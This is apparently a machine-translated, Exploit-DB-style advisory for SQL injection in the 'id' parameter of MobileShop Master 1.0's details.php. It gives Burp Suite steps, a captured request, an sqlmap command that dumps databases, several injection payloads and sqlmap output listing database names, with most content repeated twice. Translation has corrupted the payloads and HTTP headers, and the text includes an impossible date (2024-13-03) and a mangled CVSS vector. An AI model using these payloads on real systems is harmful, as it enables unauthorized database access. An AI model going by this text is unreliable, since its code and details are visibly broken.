+利用标题: MobileShop Master V1.0 -SQL注入vuln。
+软件link: https://下载- code-projects.org/2020/04/mobile_shop_shop_in_in_php_css_javascript_and_and_and_mysql_emysql_emysql__free_download.zip
+经过测试在: Windows 10 Pro
## Description:
MobileShop-Master应用程序易受SQL注入的影响,这是通过'/mobileshop-master/details.php中的“ ID”参数'。利用这种漏洞可能会导致严重的后果,包括未经授权的访问,数据操纵以及潜在的基础数据库中其他漏洞的利用。重要的是要迅速解决此问题,以减轻妥协的风险并确保应用程序及其数据的安全性和完整性。
##概念证明:
+转到登录页面:'http://localhost/mobileShop-master/login.html'
+填写电子邮件和密码。
+选择任何产品并通过Burp Suite拦截请求,然后将其发送到中继器。
+将“ ID”值更改为以下任何有效载荷。
+发送请求
##有效载荷:
##使用SQLMAP:的概念证明
+转到登录page:'http://localhormst/mobileShop-master/login.html'
+填写电子邮件和密码。
+选择任何产品并通过Burp Suite拦截请求,然后将其发送到中继器。
+复制以将请求提交给“ sql.txt”文件。
+运行以下SQLMAP命令
+ SQLMAP -R SQL.TXT -P ID -DBS
````````
post/mobileshop-master/details.php http/1.1
HOST: LOCALHOST
内容长度: 42
cache-control: max-age=0
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/122.0.6261.95 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Referer: http://localhost/MobileShop-Master/MobilesList.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=MH3MNPF51BJ2Q17HG8SIPBLTNN
连接:关闭
id=1
````````
+使用SQLMAP利用。在SQLMAP中,使用“ ID”参数转储数据库。
````````
SQLMAP -R SQL.TXT -P ID -DBS
````````
````````
---
参数: ID(发布)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: id=1'和9071=9071和'etdu'='etdu
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
payload: id=1'和(从(选择7012)中(选择count(*),concat(0x7176787071,(0x7176787071
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID=1'和(Select 7380从(Select(Sleep(5)))RLMI)和'blrn'='Blrn
type:联合查询
title:通用联盟查询(null)-13列
PAYLOAD: ID=1'联合全部选择NULL,CONCAT(0x7176787071,0x7867535464594a544444c58799624676666a4444444444444444426b5966c717241724b596 76455644B66794858734670,0x7171717671),null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null---
---
[04:17:04] [info]后端DBMS是mysql
Web Application Technology: PHP 8.2.12,Apache 2.4.58
后端DBMS: mySQL=5.0(Mariadb叉)
[04:17:04] [信息]获取数据库名称
[04:17:05] [info]恢复:'inovery_schema'
[04:17:05] [info]恢复:'1'
[04:17:05] [info]恢复:'3'
[04:17:05] [info]恢复:'admidio'
[04:17:05] [info]恢复:'calender'
[04:17:05] [info]恢复:'corregidor'
[04:17:05] [info]恢复:'健身房'
[04:17:05] [info]恢复:'JOOMLA_DB'
[04:17:05] [info]恢复:'linkstack'
[04:17:05] [info]恢复:'mobileShop'
[04:17:05] [info]恢复:'mysql'
[04:17:05] [info]恢复:'nickey'
[04:17:05] [info]恢复:'performance_schema'
[04:17:05] [info]恢复:'phpmyadmin'
[04:17:05] [info]恢复:'rcms'
[04:17:05] [info]恢复:'smith'
[04:17:05] [info]恢复:'电话'
[04:17:05] [info]恢复:'test'
[04:17:05] [info]恢复:'valente'
````````
- date: 2024-13-03
- Ema Security Ltd的+漏洞作者:“HazimArbaş”-SiberGüvenlikvebilişimhizmetleri(3https://emasecurity.com)
+软件link: https://下载- code-projects.org/2020/04/mobile_shop_shop_in_in_php_css_javascript_and_and_and_mysql_emysql_emysql__free_download.zip
+经过测试在: Windows 10 Pro
- CWE: CWE-89
- CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C3:C/C:H/I3:H/I:H/A:H
- Type: WebApps
- Platform: php
## Description:
MobileShop-Master应用程序易受SQL注入的影响,这是通过'/mobileshop-master/details.php中的“ ID”参数'。利用这种漏洞可能会导致严重的后果,包括未经授权的访问,数据操纵以及潜在的基础数据库中其他漏洞的利用。重要的是要迅速解决此问题,以减轻妥协的风险并确保应用程序及其数据的安全性和完整性。
##概念证明:
+转到登录页面:'http://localhost/mobileShop-master/login.html'
+填写电子邮件和密码。
+选择任何产品并通过Burp Suite拦截请求,然后将其发送到中继器。
+将“ ID”值更改为以下任何有效载荷。
+发送请求
##有效载荷:
- id=1'和9071=9071和'etdu'='etdu
- id=1'和(从(选择7012)中(选择计数(*),concat(0x7176787071,(select(select(ELT(7012=7012,1)))),0x7171717671,Floors(rand(0)*2)),来自Information_schema.plugins by Inlovely_schema.plugins by x)
- id=1'联合全部选择NULL,CONCAT(0x7176787071,0x7867535464594a544444c5879962467666a4444444444444444426b596b5966c7172424b59676 455644B66794858734670,0x7171717671),null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null---
##使用SQLMAP:的概念证明
+转到登录page:'http://localhormst/mobileShop-master/login.html'
+填写电子邮件和密码。
+选择任何产品并通过Burp Suite拦截请求,然后将其发送到中继器。
+复制以将请求提交给“ sql.txt”文件。
+运行以下SQLMAP命令
+ SQLMAP -R SQL.TXT -P ID -DBS
````````
post/mobileshop-master/details.php http/1.1
HOST: LOCALHOST
内容长度: 42
cache-control: max-age=0
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/122.0.6261.95 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Referer: http://localhost/MobileShop-Master/MobilesList.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=MH3MNPF51BJ2Q17HG8SIPBLTNN
连接:关闭
id=1
````````
+使用SQLMAP利用。在SQLMAP中,使用“ ID”参数转储数据库。
````````
SQLMAP -R SQL.TXT -P ID -DBS
````````
````````
---
参数: ID(发布)
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
payload: id=1'和9071=9071和'etdu'='etdu
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
payload: id=1'和(从(选择7012)中(选择count(*),concat(0x7176787071,(0x7176787071
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID=1'和(Select 7380从(Select(Sleep(5)))RLMI)和'blrn'='Blrn
type:联合查询
title:通用联盟查询(null)-13列
PAYLOAD: ID=1'联合全部选择NULL,CONCAT(0x7176787071,0x7867535464594a544444c58799624676666a4444444444444444426b5966c717241724b596 76455644B66794858734670,0x7171717671),null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null---
---
[04:17:04] [info]后端DBMS是mysql
Web Application Technology: PHP 8.2.12,Apache 2.4.58
后端DBMS: mySQL=5.0(Mariadb叉)
[04:17:04] [信息]获取数据库名称
[04:17:05] [info]恢复:'inovery_schema'
[04:17:05] [info]恢复:'1'
[04:17:05] [info]恢复:'3'
[04:17:05] [info]恢复:'admidio'
[04:17:05] [info]恢复:'calender'
[04:17:05] [info]恢复:'corregidor'
[04:17:05] [info]恢复:'健身房'
[04:17:05] [info]恢复:'JOOMLA_DB'
[04:17:05] [info]恢复:'linkstack'
[04:17:05] [info]恢复:'mobileShop'
[04:17:05] [info]恢复:'mysql'
[04:17:05] [info]恢复:'nickey'
[04:17:05] [info]恢复:'performance_schema'
[04:17:05] [info]恢复:'phpmyadmin'
[04:17:05] [info]恢复:'rcms'
[04:17:05] [info]恢复:'smith'
[04:17:05] [info]恢复:'电话'
[04:17:05] [info]恢复:'test'
[04:17:05] [info]恢复:'valente'
````````